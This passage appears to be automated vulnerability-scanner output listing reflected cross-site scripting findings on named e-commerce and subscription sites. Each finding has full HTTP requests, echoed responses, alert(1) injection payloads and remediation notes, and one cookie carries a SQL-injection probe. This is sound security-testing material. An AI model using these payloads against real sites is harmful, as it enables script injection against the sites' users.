<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
ase enter an numeric value for your quantity.");
return;
}
var cartURL = "/cgi-bin/order.asp?EdpNo=" + edpno + "&Qty=" + qty + "&ClickSource=" + click + "&icart=Y" + "&AssocEdpNo=1104495dade9";alert(1)//2de852d3325";
document.getElementById("cartframe").src = cartURL;
}

var iframeids=["cartframe"]

//Should script hide iframe from browsers that don't support this script (non IE5+/NS6+ browsers. Recomme
...[SNIP]...

3.445. http://www.tigerdirect.ca/cgi-bin/order.asp [EdpNo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /cgi-bin/order.asp

Issue detail

The value of the EdpNo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5002b"%3balert(1)//7620857deb7 was submitted in the EdpNo parameter. This input was echoed as 5002b";alert(1)//7620857deb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/order.asp?EdpNo=11044955002b"%3balert(1)//7620857deb7&qty=1&cm_re=Homepage-_-Spot%2003-_-CatId_4441_P229-1128 HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; SRCCODE=CANW; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:26:09 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA05A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&ProductTotal=79%2E98&Referer=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&TotalItems=1&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
Set-Cookie: DB=msRandX=44a4be4dd28947e8b83bdb940&msProduct=1782290&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: SRVR=WEBX15%2D05A; path=/
Vary: Accept-Encoding
Content-Length: 67667


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
ase enter an numeric value for your quantity.");
return;
}
var cartURL = "/cgi-bin/order.asp?EdpNo=" + edpno + "&Qty=" + qty + "&ClickSource=" + click + "&icart=Y" + "&AssocEdpNo=11044955002b";alert(1)//7620857deb7";
document.getElementById("cartframe").src = cartURL;
}

var iframeids=["cartframe"]

//Should script hide iframe from browsers that don't support this script (non IE5+/NS6+ browsers. Recomme
...[SNIP]...

3.446. https://www.tigerdirect.ca/secure/orderlogin.asp [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.tigerdirect.ca
Path:   /secure/orderlogin.asp

Issue detail

The value of the PG request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b5db"%20a%3db%200434cd2b109 was submitted in the PG parameter. This input was echoed as 8b5db" a=b 0434cd2b109 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /secure/orderlogin.asp?PG=8b5db"%20a%3db%200434cd2b109 HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:20 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 49791
Content-Type: text/html
Expires: Fri, 30 Sep 2011 12:30:20 GMT
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44%27+and+1%3D2%2D%2D+; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: Warranty=; expires=Sat, 03-Jan-2009 13:31:20 GMT; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&Referer=%5D%5D%3E%3E&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
Cache-control: private


<html>
<head>
<title>Order Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="TigerDirect.com is your complete o
...[SNIP]...
<input type="hidden" name="PG" value="8b5db" a=b 0434cd2b109">
...[SNIP]...

3.447. http://www.toshibadirect.com/td/b2c/accessories.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/accessories.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fc6c'-alert(1)-'9fb649c5026 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /td/b2c/accessories.jsp?5fc6c'-alert(1)-'9fb649c5026=1 HTTP/1.1
Host: www.toshibadirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:34:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: BV_IDS=ccedadfekedekelcgfkceghdgngdgln.0:@@@@1159715792.1317384206@@@@;Domain=www.toshibadirect.com;Path=/
Set-cookie: BV_IDS=ccedadfekedekelcgfkceghdgngdgln.0:@@@@1159715792.1317384206@@@@; path=/td
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 414535


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 22 $ $Workfile: accessories.jsp $ -->



...[SNIP]...
) && newLocation != lastHashName
&& newLocation != escape(lastHashName) && escape(newLocation) != lastHashName) {

updateResults('resultsAjax.jsp', '5fc6c'-alert(1)-'9fb649c5026=1&BV_UseBVCookie=yes&target=accessories.jsp&Ntk=All', 'resDiv', newLocation, '0');
}
} else {

updateResults('resultsAjax.jsp', '5fc6c'-alert(1)-'9fb649c50
...[SNIP]...

3.448. http://www.toshibadirect.com/td/b2c/afin.to [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/afin.to

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4191'-alert(1)-'de102c2b329 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /td/b2c/afin.to?a4191'-alert(1)-'de102c2b329=1 HTTP/1.1
Host: www.toshibadirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:34:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: BV_IDS=ccedadfekedekelcgfkceghdgngdgln.0:@@@@1159715792.1317384206@@@@;Domain=www.toshibadirect.com;Path=/
Set-Cookie: AccessoryFinder=Ntk=p_CompatibleLine~Ntt=All~N=;Expires=Sun, 30-Oct-2011 12:34:11 GMT;Path=/
Set-cookie: BV_IDS=ccedadfekedekelcgfkceghdgngdgln.0:@@@@1159715792.1317384206@@@@; path=/td
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 171348


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 31 $ $Workfile: accessoryFinder.jsp $ -->



...[SNIP]...
ewLocation != lastHashName
&& newLocation != escape(lastHashName) && escape(newLocation) != lastHashName) {
updateFilters('afinFiltersAjax.jsp', 'BV_UseBVCookie=yes&a4191'-alert(1)-'de102c2b329=1&target=afin.to&Ns=fprice&Ntk=p_CompatibleLine&Ntt=All', 'filtersDiv', newLocation, '0');
updateResults('resultsAjax.jsp', 'BV_UseBVCookie=yes&a4191'-alert(1)-'de102c2b329=1&target=
...[SNIP]...

3.449. http://www.toshibadirect.com/td/b2c/laptops.to [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/laptops.to

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68b25'-alert(1)-'f930d532d1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /td/b2c/laptops.to?page=segHHO&68b25'-alert(1)-'f930d532d1c=1 HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:05:41 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: BV_IDS=ccedadfekedekelcgfkceghdgngdgln.0:@@@@1159715792.1317384206@@@@;Domain=www.toshibadirect.com;Path=/
Set-cookie: BV_IDS=ccedadfekedekelcgfkceghdgngdgln.0:@@@@1159715792.1317384206@@@@; path=/td
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 297097


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 29 $ $Workfile: laptops.jsp $ -->


<script language="Java
...[SNIP]...
) && newLocation != lastHashName
&& newLocation != escape(lastHashName) && escape(newLocation) != lastHashName) {

updateResults('resultsAjax.jsp', '68b25'-alert(1)-'f930d532d1c=1&page=segHHO&BV_UseBVCookie=yes&target=laptops.to', 'resDiv', newLocation, '0');
}
} else {

updateResults('resultsAjax.jsp', '68b25'-alert(1)-'f930d532d1
...[SNIP]...

3.450. http://www.toshibadirect.com/td/b2c/laptops.to [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/laptops.to

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5166d'-alert(1)-'e8d9a0223a3 was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /td/b2c/laptops.to?page=segHHO5166d'-alert(1)-'e8d9a0223a3 HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:04:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: BV_IDS=ccedadfekedekelcgfkceghdgngdgln.0:@@@@1159715792.1317384206@@@@;Domain=www.toshibadirect.com;Path=/
Set-cookie: BV_IDS=ccedadfekedekelcgfkceghdgngdgln.0:@@@@1159715792.1317384206@@@@; path=/td
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 295923


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 29 $ $Workfile: laptops.jsp $ -->


<script language="Java
...[SNIP]...
ation != lastHashName
&& newLocation != escape(lastHashName) && escape(newLocation) != lastHashName) {

updateResults('resultsAjax.jsp', 'page=segHHO5166d'-alert(1)-'e8d9a0223a3&BV_UseBVCookie=yes&target=laptops.to', 'resDiv', newLocation, '0');
}
} else {

updateResults('resultsAjax.jsp', 'page=segHHO5166d'-alert(1)-'e8d9a0223a3&B
...[SNIP]...

3.451. http://www.toshibadirect.com/td/b2c/tv.to [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/tv.to

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b97c9'-alert(1)-'1f957b44ff5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /td/b2c/tv.to?b97c9'-alert(1)-'1f957b44ff5=1 HTTP/1.1
Host: www.toshibadirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:34:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: BV_IDS=ccedadfekedekelcgfkceghdgngdgln.0:@@@@1159715792.1317384206@@@@;Domain=www.toshibadirect.com;Path=/
Set-cookie: BV_IDS=ccedadfekedekelcgfkceghdgngdgln.0:@@@@1159715792.1317384206@@@@; path=/td
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 198090


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 5 $ $Workfile: tv.jsp $ -->


<script language="JavaScript
...[SNIP]...
) && newLocation != lastHashName
&& newLocation != escape(lastHashName) && escape(newLocation) != lastHashName) {

updateResults('resultsAjax.jsp', 'b97c9'-alert(1)-'1f957b44ff5=1&BV_UseBVCookie=yes&target=tv.to', 'resDiv', newLocation, '0');
}
} else {

updateResults('resultsAjax.jsp', 'b97c9'-alert(1)-'1f957b44ff5=1&BV_UseBVCooki
...[SNIP]...

3.452. http://www.trustmarker.com/pres [div parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustmarker.com
Path:   /pres

Issue detail

The value of the div request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da0a5'%3balert(1)//043c6cbeb43 was submitted in the div parameter. This input was echoed as da0a5';alert(1)//043c6cbeb43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pres?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420&c=1&a=0&div=tmDiv_8f1da0a5'%3balert(1)//043c6cbeb43 HTTP/1.1
Host: www.trustmarker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.jaybrokers.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:25:29 GMT
Server: Apache/2.2.20
Content-Length: 1196
Content-Type: text/html


var tmIboxPath;function tmLoadIboxLib_9f87bfa1756c87e9a15bf4fb0e7bad6a(){tmIboxPath="http://www.trustmarker.com/cert?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420&r="+escape(location.href);var tmIboxS
...[SNIP]...
].appendChild(tmIboxScript);}function tmOnLoadIboxLib(){iBox.setPath("http://www.trustmarker.com/images/");iBox.showURL(tmIboxPath,"",{width:"410",height:"440"});}

document.getElementById('tmDiv_8f1da0a5';alert(1)//043c6cbeb43').innerHTML += '<a href="http://www.trustmarker.com/cert?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420&r=' + escape(location.href) + '" rel="ibox&width=410&height=440" onclick="tmLoadIboxLib_9f87bfa175
...[SNIP]...

3.453. http://www.trustmarker.com/pres [k parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustmarker.com
Path:   /pres

Issue detail

The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 357b1'%3balert(1)//c1123920b23 was submitted in the k parameter. This input was echoed as 357b1';alert(1)//c1123920b23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pres?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420357b1'%3balert(1)//c1123920b23&c=1&a=0&div=tmDiv_8f1 HTTP/1.1
Host: www.trustmarker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.jaybrokers.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:25:27 GMT
Server: Apache/2.2.20
Content-Length: 1252
Content-Type: text/html


var tmIboxPath;function tmLoadIboxLib_4248ebd2e342c54d33cbee9b8659d7fc(){tmIboxPath="http://www.trustmarker.com/cert?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420357b1';alert(1)//c1123920b23&r="+escap
...[SNIP]...
<a href="http://www.trustmarker.com/cert?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420357b1';alert(1)//c1123920b23&r=' + escape(location.href) + '" rel="ibox&width=410&height=440" onclick="tmLoadIboxLib_4248ebd2e342c54d33cbee9b8659d7fc();return false;" >
...[SNIP]...

3.454. http://www.trustmarker.com/pres [k parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustmarker.com
Path:   /pres

Issue detail

The value of the k request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abd5b"%3balert(1)//44dcd2c2f6b was submitted in the k parameter. This input was echoed as abd5b";alert(1)//44dcd2c2f6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pres?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420abd5b"%3balert(1)//44dcd2c2f6b&c=1&a=0&div=tmDiv_8f1 HTTP/1.1
Host: www.trustmarker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.jaybrokers.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:25:25 GMT
Server: Apache/2.2.20
Content-Length: 1252
Content-Type: text/html


var tmIboxPath;function tmLoadIboxLib_860eb09f390446b3448b172af9efb00e(){tmIboxPath="http://www.trustmarker.com/cert?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420abd5b";alert(1)//44dcd2c2f6b&r="+escape(location.href);var tmIboxScript=document.createElement("script");tmIboxScript.setAttribute("src","http://www.trustmarker.com/scripts/ibox.js");tmIboxScript.setAttribute("type","text/javascr
...[SNIP]...

3.455. http://subscriptions.marvel.com/confirm/title.AVE [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://subscriptions.marvel.com
Path:   /confirm/title.AVE

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 453a4"><script>alert(1)</script>fbcbb11962f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /confirm/title.AVE HTTP/1.1
Host: subscriptions.marvel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=453a4"><script>alert(1)</script>fbcbb11962f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1jggedj1dsr60oqkfg0j29me01; split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm; __utma=125179656.1641424039.1317384215.1317384215.1317384215.1; __utmc=125179656; __utmz=125179656.1317384215.1.1.utmccn=(referral)|utmcsr=mcafeesecure.com|utmcct=/us/forconsumers/mcafee_certified_sites.jsp|utmcmd=referral; __utmb=125179656

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:10:58 GMT
Server: Apache
X-server-addr: 192.168.100.114
X-trying: 192.168.100.203
X-mysql: 192.168.100.203
Vary: Accept-Encoding
X-ServerNickName: Spidey
Content-Length: 67347
Content-Type: text/html; charset=utf-8

<html>
<head>
<title>Marvel Subscriptions - </title>
<link rel="stylesheet" href="http://i.annihil.us/u/prod//i/content/outcss/1301082360-v3-i-css-subs.css" type="text/css" media="screen">
<script
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=453a4"><script>alert(1)</script>fbcbb11962f">
...[SNIP]...

3.456. http://subscriptions.marvel.com/confirm/title.AVE [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://subscriptions.marvel.com
Path:   /confirm/title.AVE

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 886f4--><script>alert(1)</script>98026709b0b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /confirm/title.AVE HTTP/1.1
Host: subscriptions.marvel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=886f4--><script>alert(1)</script>98026709b0b
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
